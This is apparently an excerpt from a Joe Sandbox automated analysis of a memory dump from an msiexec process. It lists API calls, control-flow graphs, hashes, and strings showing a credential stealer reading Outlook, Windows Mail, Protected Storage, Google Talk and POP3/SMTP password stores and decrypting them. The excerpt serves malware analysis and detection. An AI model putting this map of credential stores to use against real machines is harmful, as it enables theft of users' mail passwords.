                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                      • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                      • API String ID: 745651260-375988210
                      • Opcode ID: 01abe85119e862d03ebbcbf30b96c63784c41f31500a9bb9b68e18ec68e211b7
                      • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                      • Opcode Fuzzy Hash: 01abe85119e862d03ebbcbf30b96c63784c41f31500a9bb9b68e18ec68e211b7
                      • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A

                      Control-flow Graph

                      APIs
                        • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                      • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                      • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                      • _mbscpy.MSVCRT(?,?), ref: 00403E54
                      Strings
                      • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                      • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                      • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                      • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                      • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                      • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                      • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                      • PStoreCreateInstance, xrefs: 00403C44
                      • pstorec.dll, xrefs: 00403C30
                      • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                      • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                      • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: Library$AddressFreeLoadProc_mbscpy
                      • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                      • API String ID: 1197458902-317895162
                      • Opcode ID: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                      • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                      • Opcode Fuzzy Hash: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                      • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 231 444c4a-444c66 call 444e38 GetModuleHandleA 234 444c87-444c8a 231->234 235 444c68-444c73 231->235 237 444cb3-444d00 __set_app_type __p__fmode __p__commode call 444e34 234->237 235->234 236 444c75-444c7e 235->236 238 444c80-444c85 236->238 239 444c9f-444ca3 236->239 246 444d02-444d0d __setusermatherr 237->246 247 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 237->247 238->234 241 444c8c-444c93 238->241 239->234 242 444ca5-444ca7 239->242 241->234 244 444c95-444c9d 241->244 245 444cad-444cb0 242->245 244->245 245->237 246->247 250 444da4-444da7 247->250 251 444d6a-444d72 247->251 254 444d81-444d85 250->254 255 444da9-444dad 250->255 252 444d74-444d76 251->252 253 444d78-444d7b 251->253 252->251 252->253 253->254 256 444d7d-444d7e 253->256 257 444d87-444d89 254->257 258 444d8b-444d9c GetStartupInfoA 254->258 255->250 256->254 257->256 257->258 259 444d9e-444da2 258->259 260 444daf-444db1 258->260 261 444db2-444dc6 GetModuleHandleA call 40cf44 259->261 260->261 264 444dcf-444e0f _cexit call 444e71 261->264 265 444dc8-444dc9 exit 261->265 265->264
                      APIs
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                      • String ID:
                      • API String ID: 3662548030-0
                      • Opcode ID: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                      • Instruction ID: dd0826a03bb44e9375613df7343647c7563f031d366e42a412bc6d4d3743f318
                      • Opcode Fuzzy Hash: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                      • Instruction Fuzzy Hash: AF41A0B0C02344DFEB619FA4D8847AD7BB8FB49325F28413BE451A7291D7388982CB5D

                      Control-flow Graph

                      APIs
                      • memset.MSVCRT ref: 0044430B
                        • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                        • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                        • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                        • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                        • Part of subcall function 00410DBB: _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                      • memset.MSVCRT ref: 00444379
                      • memset.MSVCRT ref: 00444394
                      • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                      • strlen.MSVCRT ref: 004443DB
                      • _strcmpi.MSVCRT ref: 00444401
                      Strings
                      • \Microsoft\Windows Live Mail, xrefs: 00444350
                      • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                      • \Microsoft\Windows Mail, xrefs: 00444329
                      • Store Root, xrefs: 004443A5
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memset$strlen$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                      • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                      • API String ID: 3203569119-2578778931
                      • Opcode ID: 273af5b117a68215158004e23a68f38449220407a2e325f643dbca173f5fc703
                      • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                      • Opcode Fuzzy Hash: 273af5b117a68215158004e23a68f38449220407a2e325f643dbca173f5fc703
                      • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 290 40ccd7-40cd06 ??2@YAPAXI@Z 291 40cd08-40cd0d 290->291 292 40cd0f 290->292 293 40cd11-40cd24 ??2@YAPAXI@Z 291->293 292->293 294 40cd26-40cd2d call 404025 293->294 295 40cd2f 293->295 297 40cd31-40cd57 294->297 295->297 299 40cd66-40cdd9 call 407088 call 4019b5 memset LoadIconA call 4019b5 _mbscpy 297->299 300 40cd59-40cd60 DeleteObject 297->300 300->299
                      APIs
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                      • String ID:
                      • API String ID: 2054149589-0
                      • Opcode ID: dbced873dea8b6f5d2abe1eeb19a5d79894199d53c97d45454c9f74d68e3b887
                      • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                      • Opcode Fuzzy Hash: dbced873dea8b6f5d2abe1eeb19a5d79894199d53c97d45454c9f74d68e3b887
                      • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 307 40ba28-40ba3a 308 40ba87-40ba9b call 406c62 307->308 309 40ba3c-40ba52 call 407e20 _mbsicmp 307->309 331 40ba9d call 4107f1 308->331 332 40ba9d call 404734 308->332 333 40ba9d call 404785 308->333 334 40ba9d call 403c16 308->334 314 40ba54-40ba6d call 407e20 309->314 315 40ba7b-40ba85 309->315 321 40ba74 314->321 322 40ba6f-40ba72 314->322 315->308 315->309 316 40baa0-40bab3 call 407e30 323 40bab5-40bac1 316->323 324 40bafa-40bb09 SetCursor 316->324 325 40ba75-40ba76 call 40b5e5 321->325 322->325 326 40bac3-40bace 323->326 327 40bad8-40baf7 qsort 323->327 325->315 326->327 327->324 331->316 332->316 333->316 334->316
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: Cursor_mbsicmpqsort
                      • String ID: /nosort$/sort
                      • API String ID: 882979914-1578091866
                      • Opcode ID: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                      • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                      • Opcode Fuzzy Hash: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                      • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9

                      Control-flow Graph

                      APIs
                      • memset.MSVCRT ref: 004109F7
                        • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                        • Part of subcall function 004075CD: memcpy.MSVCRT(?,00000000,00000003,00000000,%2.2X ,?), ref: 00407618
                      • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                      • memset.MSVCRT ref: 00410A32
                      • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: PrivateProfileStringmemset$Writememcpysprintf
                      • String ID:
                      • API String ID: 3143880245-0
                      • Opcode ID: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                      • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                      • Opcode Fuzzy Hash: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                      • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 358 44b33b-44b342 359 44b344-44b34a ??3@YAXPAX@Z 358->359 360 44b34b-44b352 358->360 359->360 361 44b354-44b35a ??3@YAXPAX@Z 360->361 362 44b35b-44b362 360->362 361->362 363 44b364-44b36a ??3@YAXPAX@Z 362->363 364 44b36b-44b372 362->364 363->364 365 44b374-44b37a ??3@YAXPAX@Z 364->365 366 44b37b 364->366 365->366
                      APIs
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: ??3@
                      • String ID:
                      • API String ID: 613200358-0
                      • Opcode ID: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                      • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                      • Opcode Fuzzy Hash: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                      • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 367 410dbb-410dd2 call 410d0e 370 410dd4-410ddd call 4070ae 367->370 371 410dfd-410e1b memset 367->371 380 410ddf-410de2 370->380 381 410dee-410df1 370->381 372 410e27-410e35 371->372 373 410e1d-410e20 371->373 376 410e45-410e4f call 410a9c 372->376 373->372 375 410e22-410e25 373->375 375->372 378 410e37-410e40 375->378 384 410e51-410e76 call 410d3d call 410add 376->384 385 410e7f-410e92 _mbscpy 376->385 378->376 380->371 383 410de4-410de7 380->383 387 410df8 381->387 383->371 386 410de9-410dec 383->386 384->385 388 410e95-410e97 385->388 386->371 386->381 387->388
                      APIs
                        • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,00410DCA,00000104), ref: 00410D1C
                        • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                      • memset.MSVCRT ref: 00410E10
                      • _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                        • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                      Strings
                      • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: AddressLibraryLoadProcVersion_mbscpymemset
                      • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                      • API String ID: 119022999-2036018995
                      • Opcode ID: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                      • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                      • Opcode Fuzzy Hash: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                      • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 393 4085d2-408605 call 44b090 call 4082cd call 410a9c 400 4086d8-4086dd 393->400 401 40860b-40863d memset call 410b62 393->401 404 4086c7-4086cc 401->404 405 408642-40865a call 410a9c 404->405 406 4086d2 404->406 409 4086b1-4086c2 call 410b62 405->409 410 40865c-4086ab memset call 410add call 40848b 405->410 406->400 409->404 410->409
                      APIs
                        • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                        • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                        • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                        • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                        • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                        • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                        • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                        • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                        • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                        • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                      • memset.MSVCRT ref: 00408620
                        • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                      • memset.MSVCRT ref: 00408671
                      Strings
                      • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memset$ByteCharMultiNameWidestrlen$ComputerEnumUser
                      • String ID: Software\Google\Google Talk\Accounts
                      • API String ID: 3996936265-1079885057
                      • Opcode ID: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                      • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                      • Opcode Fuzzy Hash: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                      • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 441 40ce70-40cea1 call 4023b2 call 401e69 446 40cea3-40cea6 441->446 447 40ceb8 441->447 448 40ceb2 446->448 449 40cea8-40ceb0 446->449 450 40cebd-40cecc _strcmpi 447->450 451 40ceb4-40ceb6 448->451 449->451 452 40ced3-40cedc call 40cdda 450->452 453 40cece-40ced1 450->453 451->450 454 40cede-40cef7 call 40c3d0 call 40ba28 452->454 459 40cf3f-40cf43 452->459 453->454 462 40cef9-40cefd 454->462 463 40cf0e 454->463 464 40cf0a-40cf0c 462->464 465 40ceff-40cf08 462->465 466 40cf13-40cf30 call 40affa 463->466 464->466 465->466 468 40cf35-40cf3a call 40c580 466->468 468->459
                      APIs
                        • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                        • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                        • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                        • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                        • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                      • _strcmpi.MSVCRT ref: 0040CEC3
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: strlen$_strcmpimemset
                      • String ID: /stext
                      • API String ID: 520177685-3817206916
                      • Opcode ID: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                      • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                      • Opcode Fuzzy Hash: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                      • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                      APIs
                        • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                      • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                      • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: Library$AddressFreeLoadProc
                      • String ID:
                      • API String ID: 145871493-0
                      • Opcode ID: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                      • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                      • Opcode Fuzzy Hash: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                      • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                      APIs
                      • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                        • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                        • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                        • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: PrivateProfile$StringWrite_itoamemset
                      • String ID:
                      • API String ID: 4165544737-0
                      • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                      • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                      • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                      • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                      APIs
                      • FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: FreeLibrary
                      • String ID:
                      • API String ID: 3664257935-0
                      • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                      • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                      • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                      • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                      APIs
                      • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040AEA3,00000000), ref: 00406D2C
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: CreateFile
                      • String ID:
                      • API String ID: 823142352-0
                      • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                      • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                      • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                      • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                      APIs
                      • FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: FreeLibrary
                      • String ID:
                      • API String ID: 3664257935-0
                      • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                      • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                      • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                      • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                      APIs
                      • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: CloseFind
                      • String ID:
                      • API String ID: 1863332320-0
                      • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                      • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                      • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                      • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                      APIs
                      • GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: AttributesFile
                      • String ID:
                      • API String ID: 3188754299-0
                      • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                      • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                      • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                      • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00
                      APIs
                      • LoadLibraryA.KERNEL32(advapi32.dll,?,00404A70,?,00404986,?,?,00000000,?,00000000,?), ref: 004047DA
                      • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004047EE
                      • GetProcAddress.KERNEL32(0045A9A8,CryptReleaseContext), ref: 004047FA
                      • GetProcAddress.KERNEL32(0045A9A8,CryptCreateHash), ref: 00404806
                      • GetProcAddress.KERNEL32(0045A9A8,CryptGetHashParam), ref: 00404812
                      • GetProcAddress.KERNEL32(0045A9A8,CryptHashData), ref: 0040481E
                      • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyHash), ref: 0040482A
                      • GetProcAddress.KERNEL32(0045A9A8,CryptDecrypt), ref: 00404836
                      • GetProcAddress.KERNEL32(0045A9A8,CryptDeriveKey), ref: 00404842
                      • GetProcAddress.KERNEL32(0045A9A8,CryptImportKey), ref: 0040484E
                      • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyKey), ref: 0040485A
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: AddressProc$LibraryLoad
                      • String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
                      • API String ID: 2238633743-192783356
                      • Opcode ID: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                      • Instruction ID: 70faa285c49fb169990c8fbe2f493e995bb0ef80ad344915aa685f594b7479e2
                      • Opcode Fuzzy Hash: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                      • Instruction Fuzzy Hash: 1101C978E40744AEDB316F76CC09E06BEE1EF9C7047214D2EE1C153650D77AA011DE48
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2623560717.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: PrivateProfileString_mbscmpstrlen
                      • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                      • API String ID: 3963849919-1658304561
                      • Opcode ID: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                      • Instruction ID: 768c2722c01e59d080de5de3380f4e9b1c28328498c4b4a1784570bb69a0741a
                      • Opcode Fuzzy Hash: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                      • Instruction Fuzzy Hash: B2213371D0111C6ADB61EB51DC82FEE7B7C9B44705F0400EBBA08B2082DBBC6F898E59
                      Strings
                      Memory Dump Source
